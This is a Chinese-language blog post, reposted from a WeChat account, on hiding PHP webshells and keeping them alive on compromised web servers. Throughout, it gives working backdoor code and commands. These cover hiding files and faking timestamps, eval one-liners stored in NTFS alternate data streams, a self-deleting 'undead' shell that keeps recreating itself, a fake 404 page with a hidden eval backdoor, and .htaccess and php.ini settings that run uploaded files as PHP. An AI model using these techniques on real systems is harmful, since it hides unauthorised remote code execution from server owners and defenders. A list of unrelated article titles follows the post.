当前位置:网站首页>PHP后门隐藏技巧
PHP后门隐藏技巧
2020-11-06 22:33:00 【公众号_Bypass】
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。
1、隐藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
attrib +s +a +h +r shell.php //隐藏shell.php文件
2、修改文件时间属性
当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。
//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令获取文件属性
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某个文件夹下所有文件的创建和修改时间
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。
利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、不死马
不死马会删除自身,以进程的形式循环创建隐蔽的后门。
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //删除自身
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话
sleep(10); //间隔时间
}
?>
处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。
5、中间件后门
将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。
github项目地址:
https://github.com/VladRico/apache2_BackdoorMod
6、利用404页面隐藏后门
404页面主要用来提升用户体验,可用来隐藏后门文件。
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
7、利用 .htaccess 文件构成PHP后门
一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。
AddType application/x-httpd-php .png
另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8、利用 php.ini 隐藏后门文件
php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。
;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"
需重启服务生效,访问任意一个php文件即可获取webshell。
本文分享自微信公众号 - Bypass(Bypass--)。
如有侵权,请联系 [email protected] 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
版权声明
本文为[公众号_Bypass]所创,转载请带上原文链接,感谢
https://my.oschina.net/bypass/blog/4702864
边栏推荐
- Jenkins入门(二)声明式流水线Jenkins Pipeline
- Nodejs中使用jsonwebtoken(JWT)生成token的场景使用
- August 30, 2020: naked write algorithm: the nearest common ancestor of two nodes in a binary tree.
- Practice of Xiaoxiong school development board: real equipment access of smart street lamp sandbox experiment
- 消防器材RFID固定资产管理系统
- 如何才能快速正确的部署甘特图
- September 3, 2020: naked writing algorithm: loop matrix traversal.
- 2020-08-15: under what circumstances should data tasks be optimized?
- JVM class loading mechanism
- 测试攻城狮必备技能点!一文带你解读DevOps下的测试技术
猜你喜欢
Nanjing logo design and production, guide VI system design
New features of vue3
图像处理工具包ImagXpress使用教程,如何查看事件
Configuration of AP hotspot on xunwei-imx6ull development board
A good thing for working people -- to temper the will of iron and steel requires such an efficient computer
[learning] interface test case writing and testing concerns
移动端像素适配方案
Empty test suite appears in JUnit test
Markdown tricks
条形码识别性能低,如何优化Dynamsoft Barcode Reader解码性能
随机推荐
What grammar is it? ]
JS string - string string object method
Jenkins入门(二)声明式流水线Jenkins Pipeline
迅为-iMX6ULL开发板上配置AP热点
Hdu3974 assign the task segment tree DFS order
How to deploy Gantt chart quickly and correctly
ImageMagick - add watermark
Mongo user rights login instruction
The method of local search port number occupation in Windows system
Windows 10 Bluetooth management page 'add Bluetooth or other devices' option click no response solution
Web API interface design: swaggerui document / unified response format / unified exception handling / unified authority verification
Interviewer: how about shardingsphere
Points to be considered when deleting mapping field of index in ES
【涂鸦物联网足迹】物联网基础介绍篇
消防器材RFID固定资产管理系统
VARCHART XGantt如何在日历上表示工作日
Nonvolatile MRAM memory used in all levels of cache
2020-08-15:什么情况下数据任务需要优化?
10000! Ideal car recalls all defective cars: 97 accidents have occurred and losses will be expanded
条形码识别器Dynamsoft Barcode Reader v7.5全新上线!